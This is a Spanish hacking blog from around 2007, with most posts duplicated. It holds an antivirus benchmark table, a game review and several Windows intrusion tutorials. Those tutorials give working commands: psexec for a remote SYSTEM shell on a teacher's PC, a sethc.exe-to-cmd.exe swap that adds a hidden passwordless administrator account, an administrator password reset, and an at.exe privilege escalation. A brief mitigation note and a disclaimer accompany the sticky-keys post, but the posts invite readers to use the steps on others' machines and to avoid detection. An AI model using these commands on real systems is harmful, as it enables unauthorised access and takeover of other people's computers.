Satelite nuestro k estas en el cielo
acelerado sea tu link
venga a nosotros tu hipertexto
hagase tu conexion
en lo real komo en lo virtual
danos hoy nuestro download de kada dia
perdona el cafe sobre el teclado
asi komo nosotros perdonamos a nuestros proveedores
no nos dejes caer la conexion
y libramos de todo virus
AMEN!!!
viernes, 26 de octubre de 2007
¿Cuál es el mejor Programa Antivirus?
Virus.gr hace pruebas regularmente comparando distintos programas para ver cuál es el mejor programa antivirus.
Especificaciones de la prueba de programas antivirus
En la prueba que tuvo lugar del 15 al 25 de Agosto de 2006 utilizaron un ordenador con Windows XP Professional SP1 con P4 2800 Mhz, 512MB DDRAM para comparar 58 programas antivirus frente a más de 147000 muestras de virus.
Los programas antivirus WinAntivirus, Anti-Hacker Expert, Command, Extendia AVK, GDATA AVK, BOClean, VET y Freedom no se probaron porque no había disponible una versión de prueba de estos programas.
Todos los programas antivirus probados tenían las últimas versiónes y actualizaciones y fueron probados usando sus capacidades máximas de exploración.
Las muestras de virus
Las muestras de virus se dividieron en las siguientes categorías, en función del tipo de virus:
File: BeOS, FreeBSD, Linux, Mac, Palm, OS2, Unix, BinaryImage, virus BAS, MenuetOS.
MS-DOS: virus MS-DOS.
Windows: virus Win.*.*.
Macro: Virus Macro, Multi y Formula.
Malware: Adware, DoS, Constructors, Exploit, Flooders, Nukers, Sniffers, SpamTools, Spoofers, Virus Construction Tools, Droppers, PolyEngines.
Script: Gusanos ABAP, BAT, Corel, HTML, Java, Scripts, MSH, VBS, WBS, gusanos, PHP, Perl, virus Ruby.
Troyanos / Backdoor: virus caballo de Troya y backdoor.
Resultado del test comparando los 58 programas antivirus
Estos son los resultados de la comparación de los 58 programas antivirus:
Kaspersky versión 6.0.0.303 - 99.62%
Active Virus Shield by AOL versión 6.0.0.299 - 99.62%
F-Secure 2006 versión 6.12.90 - 96.86%
BitDefender Professional versión 9 - 96.63%
CyberScrub versión 1.0 - 95.98%
eScan versión 8.0.671.1 - 95.82%
BitDefender freeware versión 8.0.202 - 95.57%
BullGuard versión 6.1 - 95.57%
AntiVir Premium versión 7.01.01.02 - 95.45%
Nod32 versión 2.51.30 - 95.14%
AntiVir Classic versión 7.01.01.02 - 94.26%
ViruScape 2006 versión 1.02.0935.0137 - 93.87%
McAfee versión 10.0.27 - 93.03%
McAfee Enterprise versión 8.0.0 - 91.76%
F-Prot versión 6.0.4.3 beta - 87.88%
Avast Professional versión 4.7.871 - 87.46%
Avast freeware versión 4.7.871 - 87.46%
Dr. Web versión 4.33.2 - 86.03%
Norman versión 5.90.23 - 85.65%
F-Prot versión 3.16f - 85.14%
ArcaVir 2006 - 83.44%
Norton Professional 2006 - 83.18%
AVG Professional versión 7.1.405 - 82.82%
AVG freeware versión 7.1.405 - 82.82%
Panda 2007 versión 2.00.01 - 82.23%
Virus Chaser versión 5.0a - 81.47%
PC-Cillin 2006 versión 14.10.1051 - 80.90%
VBA32 versión 3.11.0 - 79.12%
ViRobot Expert versión 4.0 - 76.22%
UNA versión 1.83 - 75.44%
Rising AV versión 18.41.30 - 73.60%
Sophos Sweep versión 6.0.2 - 69.48%
Ikarus versión 5.19 - 63.22%
Antiy Ghostbusters versión 5.1.3 - 61.55%
Digital Patrol versión 5.00.12 - 54.29%
Vexira 2006 versión 5.002.45 - 52.66%
V3Pro 2004 versión 6.1.1.2.640 - 52.38%
Ewido Premium versión 4.0.0.172 - 51.27%
Ewido freeware versión 4.0.0.172 - 51.27%
ClamWin versión 0.88.4 - 51.23%
E-Trust versión 7.2.0.0 - 50.36%
ZoneAlarm with VET Antivirus versión 6.5.722.000 - 44.65%
A Squared Anti-Malware versión 2.0 - 43.28%
A Squared Free versión 2.0 - 43.28%
Zondex Guard versión 5.4.2 - 41.73%
Comodo versión 1.0.0.4 - 41.02%
Solo 4.0 versión 3.1.0 - 40.83%
Protector Plus versión 7.2.H03 - 37.04%
Quick Heal versión 8.00 - 33.66%
PC Door Guard versión 4.2.0.35- 24.13%
AntiTrojan Shield versión 2.1.0.14 - 24.11%
VirIT versión 6.1.9 - 21.39%
Trojan Hunter versión 4.2.924 - 13.44%
Trojan Remover versión 6.5.1 - 8.00%
Tauscan versión 1.70.1414 - 7.70%
The Cleaner versión 4.2.4319 - 6.03%
Hacker Eliminator versión 1.2 - 1.70%
Abacre versión 1.4 - 0.00%
El programa antivirus Active Virus Shield by AOL, clasificado en segundo lugar, es gratuito.
Los 10 mejores programas antivirus utilizando solamente heurísticos
¿Qué son heurísticos?
Los heurísticos analizan el código de cada archivo con métodos genéricos y detectan virus nuevos que todavía no se han incluido en la base de datos de virus del programa antivirus.
Porqué son importantes los heurísticos
Los heurísticos son importantes porque ayudan al programa antivirus a descubrir nuevos virus desconocidos y proteger así al ordenador frente a la infección, aunque el virus específico no se haya incluido todavía en la base de datos de virus del programa antivirus.
Clasificación de programas antivirus utilizando solamente heurísticos
Nod32 2.51.30
Vba32 3.11.0
VirIT 6.1.9
AVG 7.1.405 Professional
AVG 7.1.405 freeware
Rising AV 18.41.30
McAfee 10.0.27
Ikarus 5.19
F-Prot 6.0.4.3 beta
Ukrainian National Antivirus 1.83
Especificaciones de la prueba de programas antivirus
En la prueba que tuvo lugar del 15 al 25 de Agosto de 2006 utilizaron un ordenador con Windows XP Professional SP1 con P4 2800 Mhz, 512MB DDRAM para comparar 58 programas antivirus frente a más de 147000 muestras de virus.
Los programas antivirus WinAntivirus, Anti-Hacker Expert, Command, Extendia AVK, GDATA AVK, BOClean, VET y Freedom no se probaron porque no había disponible una versión de prueba de estos programas.
Todos los programas antivirus probados tenían las últimas versiónes y actualizaciones y fueron probados usando sus capacidades máximas de exploración.
Las muestras de virus
Las muestras de virus se dividieron en las siguientes categorías, en función del tipo de virus:
File: BeOS, FreeBSD, Linux, Mac, Palm, OS2, Unix, BinaryImage, virus BAS, MenuetOS.
MS-DOS: virus MS-DOS.
Windows: virus Win.*.*.
Macro: Virus Macro, Multi y Formula.
Malware: Adware, DoS, Constructors, Exploit, Flooders, Nukers, Sniffers, SpamTools, Spoofers, Virus Construction Tools, Droppers, PolyEngines.
Script: Gusanos ABAP, BAT, Corel, HTML, Java, Scripts, MSH, VBS, WBS, gusanos, PHP, Perl, virus Ruby.
Troyanos / Backdoor: virus caballo de Troya y backdoor.
Resultado del test comparando los 58 programas antivirus
Estos son los resultados de la comparación de los 58 programas antivirus:
Kaspersky versión 6.0.0.303 - 99.62%
Active Virus Shield by AOL versión 6.0.0.299 - 99.62%
F-Secure 2006 versión 6.12.90 - 96.86%
BitDefender Professional versión 9 - 96.63%
CyberScrub versión 1.0 - 95.98%
eScan versión 8.0.671.1 - 95.82%
BitDefender freeware versión 8.0.202 - 95.57%
BullGuard versión 6.1 - 95.57%
AntiVir Premium versión 7.01.01.02 - 95.45%
Nod32 versión 2.51.30 - 95.14%
AntiVir Classic versión 7.01.01.02 - 94.26%
ViruScape 2006 versión 1.02.0935.0137 - 93.87%
McAfee versión 10.0.27 - 93.03%
McAfee Enterprise versión 8.0.0 - 91.76%
F-Prot versión 6.0.4.3 beta - 87.88%
Avast Professional versión 4.7.871 - 87.46%
Avast freeware versión 4.7.871 - 87.46%
Dr. Web versión 4.33.2 - 86.03%
Norman versión 5.90.23 - 85.65%
F-Prot versión 3.16f - 85.14%
ArcaVir 2006 - 83.44%
Norton Professional 2006 - 83.18%
AVG Professional versión 7.1.405 - 82.82%
AVG freeware versión 7.1.405 - 82.82%
Panda 2007 versión 2.00.01 - 82.23%
Virus Chaser versión 5.0a - 81.47%
PC-Cillin 2006 versión 14.10.1051 - 80.90%
VBA32 versión 3.11.0 - 79.12%
ViRobot Expert versión 4.0 - 76.22%
UNA versión 1.83 - 75.44%
Rising AV versión 18.41.30 - 73.60%
Sophos Sweep versión 6.0.2 - 69.48%
Ikarus versión 5.19 - 63.22%
Antiy Ghostbusters versión 5.1.3 - 61.55%
Digital Patrol versión 5.00.12 - 54.29%
Vexira 2006 versión 5.002.45 - 52.66%
V3Pro 2004 versión 6.1.1.2.640 - 52.38%
Ewido Premium versión 4.0.0.172 - 51.27%
Ewido freeware versión 4.0.0.172 - 51.27%
ClamWin versión 0.88.4 - 51.23%
E-Trust versión 7.2.0.0 - 50.36%
ZoneAlarm with VET Antivirus versión 6.5.722.000 - 44.65%
A Squared Anti-Malware versión 2.0 - 43.28%
A Squared Free versión 2.0 - 43.28%
Zondex Guard versión 5.4.2 - 41.73%
Comodo versión 1.0.0.4 - 41.02%
Solo 4.0 versión 3.1.0 - 40.83%
Protector Plus versión 7.2.H03 - 37.04%
Quick Heal versión 8.00 - 33.66%
PC Door Guard versión 4.2.0.35- 24.13%
AntiTrojan Shield versión 2.1.0.14 - 24.11%
VirIT versión 6.1.9 - 21.39%
Trojan Hunter versión 4.2.924 - 13.44%
Trojan Remover versión 6.5.1 - 8.00%
Tauscan versión 1.70.1414 - 7.70%
The Cleaner versión 4.2.4319 - 6.03%
Hacker Eliminator versión 1.2 - 1.70%
Abacre versión 1.4 - 0.00%
El programa antivirus Active Virus Shield by AOL, clasificado en segundo lugar, es gratuito.
Los 10 mejores programas antivirus utilizando solamente heurísticos
¿Qué son heurísticos?
Los heurísticos analizan el código de cada archivo con métodos genéricos y detectan virus nuevos que todavía no se han incluido en la base de datos de virus del programa antivirus.
Porqué son importantes los heurísticos
Los heurísticos son importantes porque ayudan al programa antivirus a descubrir nuevos virus desconocidos y proteger así al ordenador frente a la infección, aunque el virus específico no se haya incluido todavía en la base de datos de virus del programa antivirus.
Clasificación de programas antivirus utilizando solamente heurísticos
Nod32 2.51.30
Vba32 3.11.0
VirIT 6.1.9
AVG 7.1.405 Professional
AVG 7.1.405 freeware
Rising AV 18.41.30
McAfee 10.0.27
Ikarus 5.19
F-Prot 6.0.4.3 beta
Ukrainian National Antivirus 1.83
Para que sirve el comando psexec?
Facil, con este podriemos hacer infinitas cosas , pero hoy solo nos fijaremo en una
Obtener un Shell remoto(seria coomo estar frente al pc del porfe ejecutando rpogramas)
C:\>net use \\ip_profe\IPC$ password /u:Administrador
Se ha completado el comando correctamente.
C:\>psexec \\192.168.123.2 -u Administrador -p password -s cmd.exe
PsExec v1.3 - execute processes remotelyCopyright (C) 2001 Mark Russinovichwww.sysinternals.comMicrosoft Windows XP [Versión 5.1.2600](C) Copyright 1985-2001
Microsoft Corp.C:\WINDOWS\system32>
que ah pasado aqui?
pues sencillo, tenemos un cmd remoto osea todo lo q ejeutemos se hara en el pc remoto jejej , queda a vuestra creatividad
voiceis se habran dado cuenta q nos pide un password?
de donde lo obtendremos?
pues quizas en otro momento se los cuente
ssssssssss
Obtener un Shell remoto(seria coomo estar frente al pc del porfe ejecutando rpogramas)
C:\>net use \\ip_profe\IPC$ password /u:Administrador
Se ha completado el comando correctamente.
C:\>psexec \\192.168.123.2 -u Administrador -p password -s cmd.exe
PsExec v1.3 - execute processes remotelyCopyright (C) 2001 Mark Russinovichwww.sysinternals.comMicrosoft Windows XP [Versión 5.1.2600](C) Copyright 1985-2001
Microsoft Corp.C:\WINDOWS\system32>
que ah pasado aqui?
pues sencillo, tenemos un cmd remoto osea todo lo q ejeutemos se hara en el pc remoto jejej , queda a vuestra creatividad
voiceis se habran dado cuenta q nos pide un password?
de donde lo obtendremos?
pues quizas en otro momento se los cuente
ssssssssss
Escalando Privilegios en Windows XP y 2000 otras opciones
Primero que nada me gustaria dejar claro que este tutorial esta echo con fines educativos y para que algun curioso practique en su sistema, no me hago responsable del mal uso que podais hacer del mismo, recordad que urgar en sistemas ajenos es ilegal.
Antes de nada explicare un poco el pq de esta vulnerabilidad.
Este problema se debe a los programas Stickykeys y Togglekeys que Windows instala por defecto para configurar los atajos de teclado a la gente que este incapacitada para pulsar dos o mas teclas a la vez, utilizando esta aplicación (stickykeys) un usuario podra hacer ctrl+b pulsando primero una tecla y luego la otra o que (utilizando togglekeys) windows emita un sonido fuerte al activar las teclas(bloq mayus, bloq number o block despl) y una suave al desactivarlas. El fallo de esto es que Windows configura por defecto un atajo para acceder a estas aplicaciones, asi cuando un usuario da 5 veces a la tecla shift (mayusculas) o presiona la tecla bloq num durante 5 segundos, se le activaran los programas que hemos mencionado; el fichero que activan estas aplicaciones se llama sethc.exe (el mismo para los dos) y se encuentra en C:\Windows\system32, lo que vamos a hacer es sustituir este fichero por cmd.exe(que se encuentra en la misma ruta que sethc.exe) para que cuando demos 5 veces a la tecla shift o presionemos durante 5 segundos la tecla bloq num, se nos abra una consola con permisos de Administrador desde la cual podremos crearnos una cuenta con permisos de Admin o hacer lo que nos venga en gana(pero recordad que solo estamos investigando).
Escalando privilegios……
Despues de tanto rollo por fin vamos a ver como hacer todo lo que hemos comentado, para llevar acabo esto necesitaremos acceso fisico al equipo y el E.R.D Commander, este un programa con el que podremos acceder desde cd-rom a nuestro sistema y modificar el fichero que hemos mencionado con anterioridad(al final de este texto extendere un poco la informacion sobre esta aplicacion); seguro que si alguno conoce el ERD salta diciendo y pq si usas este programa no cambias el pass del Admin directamente y te dejas de tantas tonterias?, es cierto podriamos cambiar el password del Admin con este software, pero la idea es aprender un metodo con el cual no te canteas(te haces notar).
1. Configuramos la BIOS para que arranque desde CD-Rom.2. Metemos nuestro cd del E.R.D Commander(yo he utilizado el 2002 sin problemas).3. Accedemos a nuestro sistema con el Commander y nos vamos a Mycomputer C:\Windows\system32 aqui buscamos el archivo sethc.exe y lo renombramos, luego en la misma ruta marcamos cmd.exe, le damos a boton derecho y le damos a copy to, le decimos que nos lo copie en c: (por ejemplo), despues vamos a C: , buscamos el archivo cmd.exe y lo renombramos a sethc.exe, marcamos el fichero, le damos a la opcion move to y le indicamos la ruta c:\Windows\system32; por ultimo comprueba que el archivo sethc este en dicha ruta.4. Sal del E.R.D dando a start, logoff y luego reinicia el PC dandole a la opcion Reboot.5. Enciende tu PC como harias siempre y en la pantalla de bienvenida(o en la clasica de windows) le damos 5 veces a Shift(o mantenemos pulsado bloq num 5 segundos) y se nos abrira una consola(como habiamos dicho antes) .6. Ahora crearemos un usuario Admin, para ello introducimos el siguiente comando:Net user Elusuarioquequieras /add /expires:never /passwordreq:noEsto nos creara un usuario que en este caso se llamara Elusuarioquequieras, el cual nunca caduca y no requiere de password.7. Para darle permisos de Admin al usuario que hemos creado (aunque es muy provable que no lo veas en la pantalla de bienvenida), ejecutamos el siguiente comando:Net localgroup Administradores /add Elusuarioquequieras8. Reiniciamos el PC y ahora si que veremos a nuestro nuevo usuario con permisos de Admin :OO!!
Protegerse de este fallo……
Para protegerse de este fallo de seguridad basta con ir a panel de control, darle a vista clasica y entrar en opciones de accesibilidad, en la pestaña teclado nos fijamos en el cuadro que pone StickyKeys y le damos a configuracion, dentro de esta ventana desmarcamos la opcion utilizar metodo abreviado, aceptamos y listo, luego nos toca repetir los mismos pasos con Togglekeys y con Filterkeys(aunque esta ultima no termina lanzando la consola desde la pantalla de bienvenida si lo hace desde una cuenta limitada por lo que es mejor desactivar la funcion abreviada para mayor seguridad).Con esto evitariamos que un usuario ejecute el punto numero 5 de este texto desde una cuenta limitada, pero no evitaremos la ejecucion del mismo punto desde la pantalla de bienvenida, algo que tendria que haber sido corregido hace bastante tiempo.====================================================ERD Commander es una aplicacion destinada a la reparacion y recuperacion de sistemas windows NT,2000 y XP el cual nos permite el acceso a dichos sistemas con permiso de administrador desde donde podremos solucionar cualquier problema de arranque del sistema, conflictos de controladores, eliminar programas o archivos maliciosos, etc y todo esto arrancando desde cd-rom(tb puede ser instalado en el disco duro pero es conveniente tenerlo en CD) lo que nos permitira un mejor analisis de nuestro sistema y posterior solucion.Estos datos son referentes al ERD Commander 2002, hoy en dia existe la version 2005 que tb soporta sistemas 2003 server.
Antes de nada explicare un poco el pq de esta vulnerabilidad.
Este problema se debe a los programas Stickykeys y Togglekeys que Windows instala por defecto para configurar los atajos de teclado a la gente que este incapacitada para pulsar dos o mas teclas a la vez, utilizando esta aplicación (stickykeys) un usuario podra hacer ctrl+b pulsando primero una tecla y luego la otra o que (utilizando togglekeys) windows emita un sonido fuerte al activar las teclas(bloq mayus, bloq number o block despl) y una suave al desactivarlas. El fallo de esto es que Windows configura por defecto un atajo para acceder a estas aplicaciones, asi cuando un usuario da 5 veces a la tecla shift (mayusculas) o presiona la tecla bloq num durante 5 segundos, se le activaran los programas que hemos mencionado; el fichero que activan estas aplicaciones se llama sethc.exe (el mismo para los dos) y se encuentra en C:\Windows\system32, lo que vamos a hacer es sustituir este fichero por cmd.exe(que se encuentra en la misma ruta que sethc.exe) para que cuando demos 5 veces a la tecla shift o presionemos durante 5 segundos la tecla bloq num, se nos abra una consola con permisos de Administrador desde la cual podremos crearnos una cuenta con permisos de Admin o hacer lo que nos venga en gana(pero recordad que solo estamos investigando).
Escalando privilegios……
Despues de tanto rollo por fin vamos a ver como hacer todo lo que hemos comentado, para llevar acabo esto necesitaremos acceso fisico al equipo y el E.R.D Commander, este un programa con el que podremos acceder desde cd-rom a nuestro sistema y modificar el fichero que hemos mencionado con anterioridad(al final de este texto extendere un poco la informacion sobre esta aplicacion); seguro que si alguno conoce el ERD salta diciendo y pq si usas este programa no cambias el pass del Admin directamente y te dejas de tantas tonterias?, es cierto podriamos cambiar el password del Admin con este software, pero la idea es aprender un metodo con el cual no te canteas(te haces notar).
1. Configuramos la BIOS para que arranque desde CD-Rom.2. Metemos nuestro cd del E.R.D Commander(yo he utilizado el 2002 sin problemas).3. Accedemos a nuestro sistema con el Commander y nos vamos a Mycomputer C:\Windows\system32 aqui buscamos el archivo sethc.exe y lo renombramos, luego en la misma ruta marcamos cmd.exe, le damos a boton derecho y le damos a copy to, le decimos que nos lo copie en c: (por ejemplo), despues vamos a C: , buscamos el archivo cmd.exe y lo renombramos a sethc.exe, marcamos el fichero, le damos a la opcion move to y le indicamos la ruta c:\Windows\system32; por ultimo comprueba que el archivo sethc este en dicha ruta.4. Sal del E.R.D dando a start, logoff y luego reinicia el PC dandole a la opcion Reboot.5. Enciende tu PC como harias siempre y en la pantalla de bienvenida(o en la clasica de windows) le damos 5 veces a Shift(o mantenemos pulsado bloq num 5 segundos) y se nos abrira una consola(como habiamos dicho antes) .6. Ahora crearemos un usuario Admin, para ello introducimos el siguiente comando:Net user Elusuarioquequieras /add /expires:never /passwordreq:noEsto nos creara un usuario que en este caso se llamara Elusuarioquequieras, el cual nunca caduca y no requiere de password.7. Para darle permisos de Admin al usuario que hemos creado (aunque es muy provable que no lo veas en la pantalla de bienvenida), ejecutamos el siguiente comando:Net localgroup Administradores /add Elusuarioquequieras8. Reiniciamos el PC y ahora si que veremos a nuestro nuevo usuario con permisos de Admin :OO!!
Protegerse de este fallo……
Para protegerse de este fallo de seguridad basta con ir a panel de control, darle a vista clasica y entrar en opciones de accesibilidad, en la pestaña teclado nos fijamos en el cuadro que pone StickyKeys y le damos a configuracion, dentro de esta ventana desmarcamos la opcion utilizar metodo abreviado, aceptamos y listo, luego nos toca repetir los mismos pasos con Togglekeys y con Filterkeys(aunque esta ultima no termina lanzando la consola desde la pantalla de bienvenida si lo hace desde una cuenta limitada por lo que es mejor desactivar la funcion abreviada para mayor seguridad).Con esto evitariamos que un usuario ejecute el punto numero 5 de este texto desde una cuenta limitada, pero no evitaremos la ejecucion del mismo punto desde la pantalla de bienvenida, algo que tendria que haber sido corregido hace bastante tiempo.====================================================ERD Commander es una aplicacion destinada a la reparacion y recuperacion de sistemas windows NT,2000 y XP el cual nos permite el acceso a dichos sistemas con permiso de administrador desde donde podremos solucionar cualquier problema de arranque del sistema, conflictos de controladores, eliminar programas o archivos maliciosos, etc y todo esto arrancando desde cd-rom(tb puede ser instalado en el disco duro pero es conveniente tenerlo en CD) lo que nos permitira un mejor analisis de nuestro sistema y posterior solucion.Estos datos son referentes al ERD Commander 2002, hoy en dia existe la version 2005 que tb soporta sistemas 2003 server.
Reset Password xp
Muchachos esto solo funciona en win NT superior, siempre y cuando no estemos dentro de un dominio y esten aplicadas las malditas directivas de grupo
Ejecutar cmd.
net user administrador * press enter
nos pide en new password , listo... ya tenemos acceso al admin
queda a vuestra creatividad
Created Fenix
msn:alexisalonso_15
Ejecutar cmd.
net user administrador * press enter
nos pide en new password , listo... ya tenemos acceso al admin
queda a vuestra creatividad
Created Fenix
msn:alexisalonso_15
Escalada de privilegios en Windows XP
Introducción:
Normalmente cuando se realiza una intrusión en un sistema se busca alguna vulnerabilidad que deje la seguridad del sistema comprometida, si el administrador del sistema es muy descuidado es posible que el sistema no esté totalmente parcheado o seguro, cuando ésto ocurre, lo mas fácil es explotar alguna de estas vulnerabilidades no parcheadas del propio sistema, lo cual suele permitir el acceso al atacante con premisos de sistema (no siempre)ejej.
Si el sistema se encuentra actualizado y no parece que tenga alguna vulnerabilidad conocida, el siguiente paso es buscar información de los programas y servcios que está corriendo ese sistema, muchas veces el usuario utiliza programas desactualizados que contienen vulnerabilidades, normalmente, utilizar estas vulnerabilidades para acceder al sistema, devuelven al atacante un acceso con los permisos del usuario que estaba corriendo el programa vulnerable. Ésta es la razón por la que siempre se insite en que no se utilicen cuentas de usuario con permisos elevados en el uso cotidiano del equipo.
Se hace necesario, por lo tanto, realizar un segundo ataque pero esta vez para elevar los privilegios y así conseguir el control total del equipo.
Vulnerabilidad:
Se acaba de publicar un flash demostración de lo fácil que es elevar los privilegios de un usuario en Windows XP.
El problema está en el comando "at.exe", que sirve para programar tareas desde la linea de comandos.
Cuando un usuario lanza una ventana de comandos (cmd.exe) mediante el comando "at.exe", este cmd heredará permisos de sistema (system). Basta con reiniciar el "explorer.exe" desde esa ventana para hacerse con el entorno del usuario "system".
NOTA: como bien me comenta JMGA este ataque sirve para elevar los permisos de "Administrador" a "System" debido a que el uso del comando "at.exe" no está permitido para todos los usuarios.
Demostración: http://www.projectstreamer.com/users/r0t0r00t3r/xp_priv_esc/xp_priv_esc.html
Mas información:
CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3209
Bugtraq: http://www.securityfocus.com/archive/1/436884/100/200/threaded
SANS: http://isc.sans.org/diary.php?storyid=1542
Origen: isc.sans.org
Normalmente cuando se realiza una intrusión en un sistema se busca alguna vulnerabilidad que deje la seguridad del sistema comprometida, si el administrador del sistema es muy descuidado es posible que el sistema no esté totalmente parcheado o seguro, cuando ésto ocurre, lo mas fácil es explotar alguna de estas vulnerabilidades no parcheadas del propio sistema, lo cual suele permitir el acceso al atacante con premisos de sistema (no siempre)ejej.
Si el sistema se encuentra actualizado y no parece que tenga alguna vulnerabilidad conocida, el siguiente paso es buscar información de los programas y servcios que está corriendo ese sistema, muchas veces el usuario utiliza programas desactualizados que contienen vulnerabilidades, normalmente, utilizar estas vulnerabilidades para acceder al sistema, devuelven al atacante un acceso con los permisos del usuario que estaba corriendo el programa vulnerable. Ésta es la razón por la que siempre se insite en que no se utilicen cuentas de usuario con permisos elevados en el uso cotidiano del equipo.
Se hace necesario, por lo tanto, realizar un segundo ataque pero esta vez para elevar los privilegios y así conseguir el control total del equipo.
Vulnerabilidad:
Se acaba de publicar un flash demostración de lo fácil que es elevar los privilegios de un usuario en Windows XP.
El problema está en el comando "at.exe", que sirve para programar tareas desde la linea de comandos.
Cuando un usuario lanza una ventana de comandos (cmd.exe) mediante el comando "at.exe", este cmd heredará permisos de sistema (system). Basta con reiniciar el "explorer.exe" desde esa ventana para hacerse con el entorno del usuario "system".
NOTA: como bien me comenta JMGA este ataque sirve para elevar los permisos de "Administrador" a "System" debido a que el uso del comando "at.exe" no está permitido para todos los usuarios.
Demostración: http://www.projectstreamer.com/users/r0t0r00t3r/xp_priv_esc/xp_priv_esc.html
Mas información:
CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3209
Bugtraq: http://www.securityfocus.com/archive/1/436884/100/200/threaded
SANS: http://isc.sans.org/diary.php?storyid=1542
Origen: isc.sans.org
Podes ser un Hacker con Uplink Elite
Los secretos de un Hacker en un juego.
Contenido escrito por: Guillermo "CeReBrO" Ferrero .En esta ocasión nos encontramos con un juego distinto..... Nada de graficos 3d, ni sonido de orquesta, apenas unos pitidos semi techno y una interfaz que representaria la de un sistema operativo del año 2010(epoca en la que transcurre el juego), el argumento es sencillo.... somo egresados de la universidad con un titulo de Ingeniero en sistemas bajo el brazo... que podemos hacer?? Unirnos a la corporación Uplink por supuesto, la central mundial de los Hackers en los tiempos que corren, se nos ofrece un Gateway que sera nuestra salida a internet, un pequeño prestamo del banco internacional de la compania para iniciar nuestras actividades, el soft basico para copiar y borrar archivos y la aclaración de que si somos descubiertos, la organización negara todo contacto con nosotros , brillante futuro el nuestro.El juego se desarrolla desde la pantalla principal de nuestra Gateway, desde la misma nos conectamos a distintos equipos remotos o al servidor de asuntos internos de Uplink y conseguimos misiones de distintas companias que varian entre copiar o borrar archivos de organizaciones rivales, modificar regristros universitarios(para mejor o para peor), modificar datos particulares, plantar virus en un sistema y seguir los pasos de otro hacker para dar con su ubicación.Después de jugarlo durante un tiempo uno piensa que ya no quedan cosas por hacer, hasta que se devela una trama de conflictos dentro de la corporación, asi como una guerra informatica entre dos companias rivales por el desarrollo de un virus capaz de destruir cuanto sistema informatico se conoce, brindando al juego una rejugabilidad amplia.El juego destaca por su “realismo” por asi decirlo... si nos descubren, todo nuestro progreso, toda nuestra trayectoria sera destruida y tendremos que reiniciar nuestra carrera con el soft basico nuevamente, esto puede parecer frustrante, pero nadie dijo que teniamos un seguro cuando nos unimos a la compania.Resumiendo, un juego que vale la pena, simple y a la vez atrapante, totalmente innovador, y una buena opcion para pasar largas horas delante de nuestro monitor rogando a que ese archivo tan necesitado se copie antes de que nuestro sistema nos avise que hemos sido detectados.
Contenido escrito por: Guillermo "CeReBrO" Ferrero .En esta ocasión nos encontramos con un juego distinto..... Nada de graficos 3d, ni sonido de orquesta, apenas unos pitidos semi techno y una interfaz que representaria la de un sistema operativo del año 2010(epoca en la que transcurre el juego), el argumento es sencillo.... somo egresados de la universidad con un titulo de Ingeniero en sistemas bajo el brazo... que podemos hacer?? Unirnos a la corporación Uplink por supuesto, la central mundial de los Hackers en los tiempos que corren, se nos ofrece un Gateway que sera nuestra salida a internet, un pequeño prestamo del banco internacional de la compania para iniciar nuestras actividades, el soft basico para copiar y borrar archivos y la aclaración de que si somos descubiertos, la organización negara todo contacto con nosotros , brillante futuro el nuestro.El juego se desarrolla desde la pantalla principal de nuestra Gateway, desde la misma nos conectamos a distintos equipos remotos o al servidor de asuntos internos de Uplink y conseguimos misiones de distintas companias que varian entre copiar o borrar archivos de organizaciones rivales, modificar regristros universitarios(para mejor o para peor), modificar datos particulares, plantar virus en un sistema y seguir los pasos de otro hacker para dar con su ubicación.Después de jugarlo durante un tiempo uno piensa que ya no quedan cosas por hacer, hasta que se devela una trama de conflictos dentro de la corporación, asi como una guerra informatica entre dos companias rivales por el desarrollo de un virus capaz de destruir cuanto sistema informatico se conoce, brindando al juego una rejugabilidad amplia.El juego destaca por su “realismo” por asi decirlo... si nos descubren, todo nuestro progreso, toda nuestra trayectoria sera destruida y tendremos que reiniciar nuestra carrera con el soft basico nuevamente, esto puede parecer frustrante, pero nadie dijo que teniamos un seguro cuando nos unimos a la compania.Resumiendo, un juego que vale la pena, simple y a la vez atrapante, totalmente innovador, y una buena opcion para pasar largas horas delante de nuestro monitor rogando a que ese archivo tan necesitado se copie antes de que nuestro sistema nos avise que hemos sido detectados.
Suscribirse a:
Entradas (Atom)